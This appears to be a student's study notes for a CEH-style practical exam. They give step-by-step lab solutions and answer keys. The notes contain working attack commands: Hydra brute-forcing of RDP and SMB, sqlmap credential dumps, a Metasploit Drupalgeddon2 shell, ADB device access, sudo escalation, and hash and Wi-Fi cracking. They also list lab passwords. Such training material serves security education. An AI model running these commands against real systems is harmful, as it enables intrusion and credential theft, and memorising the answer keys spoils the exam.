my notes

The document outlines a series of steps for solving various cybersecurity tasks, including network scanning, credential cracking, file retrieval, and vulnerability assessment. It provides detailed instructions for exploiting services, extracting sensitive data, and performing SQL injection attacks across different systems. Each task includes specific commands and expected outputs, emphasizing practical techniques for penetration testing and security analysis.

Uploaded by

xan parker
Copyright: © All Rights Reserved

Final Notes 2

23 February 2025 08:37

Here are the steps to solve the questions previously listed, based on the information in the sources:
• Perform an extensive scan of the target network and identify the Product Version of the
Domain Controller.
○ You need to perform a thorough scan of the network to identify the domain controller
and its product version.
• Perform extensive scanning and service enumeration of the target networks and identify the
number of mercury services running in the Server.
○ 7. You need to scan the target network, enumerate the services, and count the Mercury
services running on the server. The source mentions Mercury services running on ports
25, 110, and 143.
• Identify a machine with RDP service enabled in the 10.10.55.0/24 subnet. Crack the RDP
credentials for user Jones and obtain a file hide.cfe containing an encrypted image file.
Decrypt the file and enter the CRC32 value of the image file as the answer.
○ Identify Machines with RDP Enabled: Use Nmap to scan the subnet for machines with
port 3389 open.
○ Crack RDP Credentials: Use Hydra to crack the RDP credentials for the user Jones, using
a password list.
○ Transfer the File: Transfer the file to a Parrot or Windows machine.
○ Calculate CRC32: Upload the image to a CRC32 online tool to get the CRC32 value. An
example of such a tool is provided.
○ 2bb407ea.
• Analyze the image file from one of the employee's mobile devices in the 10.10.55.0/24
subnet and extract the sensitive data hidden in the file and enter the secret code as the
answer.
○ Scan the Subnet: Scan the subnet to identify the mobile device.
○ Connect via ADB: Connect to the device using ADB.
▪ adb connect 10.10.55.X:5555
○ Locate and Pull Image File: Locate the image file on the device and pull it to your
machine.
▪ find /sdcard/ -name "*.jpg" -o -name "*.png"
▪ adb pull /sdcard/Downloads/CEH.jpg ./ceh.jpg
○ Extract Hidden Data with Steghide: Use Steghide to extract the hidden data from the
image file.
▪ steghide extract -sf ceh.jpg
○ Analyze Extracted Data: Analyze the extracted data to find the secret code.
○ F!AgBr^V0.
• Perform a vulnerability scan for the host with IP address 192.168.44.32. What is the CVE
number of the vulnerability with the least severity score?
○ Log in to OpenVAS: Log in to OpenVAS.
○ Create a New Target: Create a new target with the IP address 192.168.44.32.
○ Create a New Task: Create a new task and select the target.
○ Run the Task: Start the scan.
○ View the Report: View the report and sort vulnerabilities by severity.
○ Identify the Least Severe Vulnerability: Note the CVE number.
○ 2020-7068.
• Exploit a remote login and command-line execution application on a Linux target in the
10.10.55.0/24 subnet to access a sensitive file, Netnormal.txt. Enter the content in the file as
the answer.
○ Search for ssh port: Search for the SSH port in the subnet.
○ Login using credentials: Log in using the credentials Marcus:M3rcy@123.
▪ ssh [email protected]
○ Find the Netnormal.txt: Find the Netnormal.txt.
▪ find / -type f -name Netnormal.txt 2> /dev/null
○ Cat the content: Display the contents and submit the answer.
○ H0m3@l0n3.
• An ex-employee of an organization has stolen a vital account credential and stored it in a file
named restricted.txt. Enter the credential as the answer.
○ Navigate to the Directory: Change to the directory where restricted.txt is located
(Documents folder).
○ Decrypt Using Stegsnow: Use Stegsnow with the password "password" to extract the
hidden credential from restricted.txt.
▪ stegsnow -p password -C restricted.txt output.txt
○ View the Extracted Credential: View the content of output.txt to retrieve the vital
account credential.
○ Decode it: The content of output.txt is Base64-encoded, so decode it.
▪ cat output.txt | base64 -d
○ maddy@777.
• Exploit weak credentials used for SMB service on a Windows machine in the 10.10.55.0/24
subnet. Obtain the file, Sniffer.txt hosted on the SMB root, and enter its content as the
answer.
○ Identify SMB Service: Use Nmap to identify machines with SMB service enabled.
▪ nmap -p 139,445 --open -sV 10.10.55.0/24
○ Enumerate SMB Shares: Enumerate SMB shares to find the share hosting Sniffer.txt.
▪ smbclient -L \\\\10.10.55.X
○ Brute-force SMB Credentials: Brute-force SMB credentials if necessary.
▪ hydra -L user_list.txt -P password_list.txt 10.10.55.X smb
○ Access SMB Share: Access the SMB share using valid credentials.
▪ smbclient \\\\10.10.55.X\\share_name -U user%password123
○ Retrieve and Read Sniffer.txt: Retrieve the Sniffer.txt file and read its content.
▪ get Sniffer.txt
▪ cat Sniffer.txt
○ h@ck3r00t.
• Access the Ubuntu machine in the 10.10.55.0/24 network, perform vertical privilege
escalation to that of a root user, and enter the content of the imroot.txt file as the answer.
○ SSH into the machine: SSH into the machine using the credentials Marcus and M3rcy@123.
▪ ssh [email protected]
○ Check sudo privileges: Check sudo privileges to see if privilege escalation is possible.
▪ sudo -l
○ Switch to root if possible: Switch to the root user if allowed.
▪ sudo -i
○ Find the imroot.txt file: Find the imroot.txt file.
▪ find / -name "imroot.txt" 2>/dev/null
○ Read the content: Read the content of the imroot.txt file.
▪ cat imroot.txt
○ JH8754@!.
• Check how many files are present in the Scan Folder of a Windows machine in the
10.10.55.0/24 subnet and enter the number of files sniffed by the employee as the answer.
○ Launch the RAT Client and establish a connection to the target machine:
○ Use the File Manager to navigate to the "Scan" folder:
○ Count the number of files in the "Scan" folder:
○ 5.
• Find PT_LOAD 0 of the malware executable file given.
○ Open DIE and load the executable:
○ Switch to ELF Tab:
○ Locate PT_LOAD 0:
○ Record the Virtual Address and Offset:
○ 000c54ec.
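What the ELF tab reads for this task, as an added example that is not part of the original notes: a parser that walks the program header table and returns the first PT_LOAD entry's file offset and virtual address. The sample ELF image is constructed for the demo, so its values are not those of the exam file; the function names are hypothetical.

```python
import struct

PT_LOAD = 1  # p_type value for a loadable segment

def first_pt_load(data: bytes) -> dict:
    """Return the first PT_LOAD program header ("PT_LOAD 0") of an ELF image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] not in (1, 2) or data[5] not in (1, 2):
        raise ValueError("bad EI_CLASS or EI_DATA")
    is64 = data[4] == 2                      # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if data[5] == 1 else ">"       # EI_DATA: 1 = little, 2 = big endian
    if is64:
        (e_phoff,) = struct.unpack_from(end + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(end + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 0x2A)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        try:
            if is64:  # type, flags, offset, vaddr, paddr, filesz, memsz, align
                p_type, _, p_offset, p_vaddr, _, p_filesz, _, _ = struct.unpack_from(
                    end + "IIQQQQQQ", data, off)
            else:     # type, offset, vaddr, paddr, filesz, memsz, flags, align
                p_type, p_offset, p_vaddr, _, p_filesz, _, _, _ = struct.unpack_from(
                    end + "8I", data, off)
        except struct.error:
            raise ValueError("program header table runs past end of file")
        if p_type == PT_LOAD:
            return {"phdr_index": i, "offset": p_offset,
                    "vaddr": p_vaddr, "filesz": p_filesz}
    raise ValueError("no PT_LOAD segment")

def build_sample_elf32() -> bytes:
    """Constructed 32-bit little-endian ELF: header, PT_PHDR, then one PT_LOAD."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    header = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x08048100,
                                 52, 0, 0, 52, 32, 2, 0, 0, 0)
    pt_phdr = struct.pack("<8I", 6, 52, 0x08048034, 0x08048034, 64, 64, 4, 4)
    pt_load = struct.pack("<8I", 1, 0, 0x08048000, 0x08048000, 0x200, 0x200, 5, 0x1000)
    return header + pt_phdr + pt_load

if __name__ == "__main__":
    seg = first_pt_load(build_sample_elf32())
    print(f"PT_LOAD 0: offset=0x{seg['offset']:08x} vaddr=0x{seg['vaddr']:08x}")
```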
• Identify the packets responsible for the DDoS attack and determine the least IPv4 packet
count sent to the victim machine.
○ Open Wireshark and load Evil-traffic.pcapng:
○ Apply the display filter: Filter for the specific IP address.
▪ ip.dst == 172.22.10.10
○ Open IPv4 Conversations:
○ Sort by Packets: Sort conversations by packet count.
○ Identify the least packet count: Look through the sorted list to find the conversation
with the least number of packets sent to 172.22.10.10.
○ 19554.
• Perform an SQL injection attack on cinema.cehorg.com and extract the password of user
Daniel.
○ Run sqlmap: Use sqlmap to perform an SQL injection attack.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --cookie="PHPSESSID=your_session_id" --dump
○ Identify the Database and Tables: List the databases and tables to identify the relevant
ones.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --cookie="PHPSESSID=your_session_id" --dbs
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --cookie="PHPSESSID=your_session_id" -D database_name --tables
○ Extract the User Table: Extract the user table and dump the data.
▪ sqlmap -u "http://cinema.cehorg.com/search.php?q=test" --cookie="PHPSESSID=your_session_id" -D database_name -T users -C username,password --dump
○ qwertyuiop.
• Explore the web application at www.cehorg.com and enter the flag's value on the page with
page_id=95.
○ Open the URL: Open the specified URL in a web browser.
▪ http://www.cehorg.com/index.php?page_id=95
○ View Page Source: View the page source to find the flag.
○ Search for the Flag: Search for the flag in the page source.
○ B$#98TY.
• Perform vulnerability research and exploit the web application training.cehorg.com,
available at 10.10.55.50. Locate the Flag.txt file and enter its content as the answer.
○ Verify the Target: Verify the target is running a Drupal site.
○ Launch Metasploit: Launch Metasploit Framework.
○ Search for the Drupalgeddon2 Exploit: Search for the Drupalgeddon2 module.
○ Select the Exploit Module: Use the appropriate module from the search results.
▪ use exploit/unix/webapp/drupal_drupalgeddon2
○ Set the Target and Options: Set the RHOST to the target IP and any other necessary
options.
▪ set RHOST 10.10.55.50
▪ set RPORT 80
○ Run the Exploit: Execute the exploit.
▪ run
○ Obtain a Shell: If the exploit is successful, you will get a shell on the target machine.
○ Navigate the File System: Use basic Linux commands to navigate and locate the Flag.txt
file.
▪ find / -name Flag.txt 2>/dev/null
○ Read the Content of Flag.txt: Once you locate the file, read its content.
○ M@d(y535.
• Find the value in the Flag column in one of the DB tables and enter it as the answer after
performing SQL injection attack on a web application, cybersec.cehorg.com, available at
192.168.44.40.
○ Launch sqlmap with Crawl, Level, and Risk Parameters:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 --dbs
○ Review the Discovered Databases: Identify the relevant database containing the Flag
column.
○ List Tables in the Database:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 -D database_name --tables
○ Dump Data from Relevant Tables:
▪ sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 -D database_name -T table_name -C Flag --dump
○ Review the Output: Look for the value that matches the required format.
○ (y83r5EC.
• Access the files uploaded through DVWA (http://192.168.44.32:8080/DVWA) and decode
the base64 ciphers to reveal the original message among them. Enter the decrypted
message as the answer.
○ Access DVWA Web Application:
▪ http://192.168.44.32:8080/DVWA/ECweb/Certified/
○ Navigate to the Directory: Navigate to the directory containing the files.
○ Identify Base64 Encoded Files: Look for files within the directory that appear to be
encoded in base64.
○ Decode Base64 Content: Download the base64 encoded file(s) to your local machine
and decode the contents.
▪ cat filename.txt | base64 --decode > decoded.txt
○ H^(ker@EC.
• Analyze the traffic capture from an IoT network, identify the packet with IoT Publish
Message, and enter the topic length as the answer.
○ Access the Packet Capture File:
○ Use Wireshark to Analyze the Capture:
○ Apply Display Filter:
▪ mqtt.msgtype == 3
○ Identify Packet Details: Look through the filtered packets to find an MQTT Publish
Message.
○ Determine the Topic Length: Examine the topic field and determine the topic length.
○ 9.
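Where the topic length sits inside a Publish message, as an added example that is not part of the original notes: a parser for an MQTT 3.1.1 PUBLISH packet that decodes the variable-length Remaining Length and then reads the 2-byte Topic Length field. The packets are constructed for the demo (topic and payload are made up, not taken from the exam capture) and the function names are hypothetical.

```python
def decode_remaining_length(packet: bytes) -> tuple:
    """Decode the variable-length Remaining Length; return (value, next_pos)."""
    value, shift = 0, 0
    for pos in range(1, 5):                  # the field is 1 to 4 bytes long
        if pos >= len(packet):
            raise ValueError("truncated fixed header")
        value |= (packet[pos] & 0x7F) << shift
        shift += 7
        if not packet[pos] & 0x80:           # continuation bit clear: last byte
            return value, pos + 1
    raise ValueError("Remaining Length longer than 4 bytes")

def parse_publish(packet: bytes) -> dict:
    """Parse one MQTT 3.1.1 PUBLISH packet (message type 3)."""
    if not packet or packet[0] >> 4 != 3:
        raise ValueError("not a PUBLISH packet")
    qos = (packet[0] >> 1) & 0x03            # flags nibble: DUP | QoS(2) | RETAIN
    remaining, pos = decode_remaining_length(packet)
    body = packet[pos:pos + remaining]
    if len(body) != remaining or remaining < 2:
        raise ValueError("truncated packet")
    topic_len = int.from_bytes(body[:2], "big")   # the Topic Length field
    if 2 + topic_len > len(body):
        raise ValueError("topic length exceeds packet body")
    cursor, packet_id = 2 + topic_len, None
    if qos:                                  # Packet Identifier only when QoS > 0
        packet_id = int.from_bytes(body[cursor:cursor + 2], "big")
        cursor += 2
    return {"topic_len": topic_len, "topic": body[2:2 + topic_len].decode("utf-8"),
            "qos": qos, "packet_id": packet_id, "payload": body[cursor:]}

def build_publish(topic: str, payload: bytes, qos: int = 0, packet_id: int = 1) -> bytes:
    """Build a constructed PUBLISH packet so the parser can run offline."""
    t = topic.encode("utf-8")
    body = len(t).to_bytes(2, "big") + t
    body += (packet_id.to_bytes(2, "big") if qos else b"") + payload
    n, length = len(body), bytearray()
    while True:                              # encode Remaining Length, 7 bits per byte
        n, low = divmod(n, 128)
        length.append(low | (0x80 if n else 0))
        if not n:
            break
    return bytes([0x30 | (qos << 1)]) + bytes(length) + body

if __name__ == "__main__":
    print(parse_publish(build_publish("sensors/lab/temp", b"21.5", qos=1, packet_id=10)))
```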
• Decrypt the hash in the Hash2crack.txt file, access the Veracrypt volume, and find the secret
code in the file named EC_data.txt.
○ Retrieve the Hashed Password: Access the ParrotSecurity machine and retrieve the
hash from Hash2crack.txt.
○ Crack the Hashed Password: Use a hash-cracking tool to recover the password from the hash.
▪ john --format=Raw-MD5 --wordlist=rockyou.txt Hash2crack.txt
○ Mount the VeraCrypt Volume: On the "EH Workstation 2" machine, open VeraCrypt and
mount the volume Its_File, providing the recovered password.
○ Retrieve the Secret Code: Locate and open EC_data.txt within the mounted VeraCrypt
volume.
○ 3C_c0un(!L.
• Crack the wireless encryption and enter the total number of characters present in the Wi-Fi
password.
○ Access the Capture File: Access the ParrotSecurity machine and navigate to the
Documents folder where W!F!_Pcap.cap is located.
○ Analyze the Capture File: Use Aircrack-ng to crack the encryption.
▪ airodump-ng 'W!F!_Pcap.cap'
▪ airodump-ng --bssid BSSID --channel CHANNEL -w outputfile 'W!F!_Pcap.cap'
▪ aircrack-ng -w /path/to/wordlist.txt outputfile-01.cap
○ Determine the Password Length: Note the length of the cracked Wi-Fi password.
○ 9.
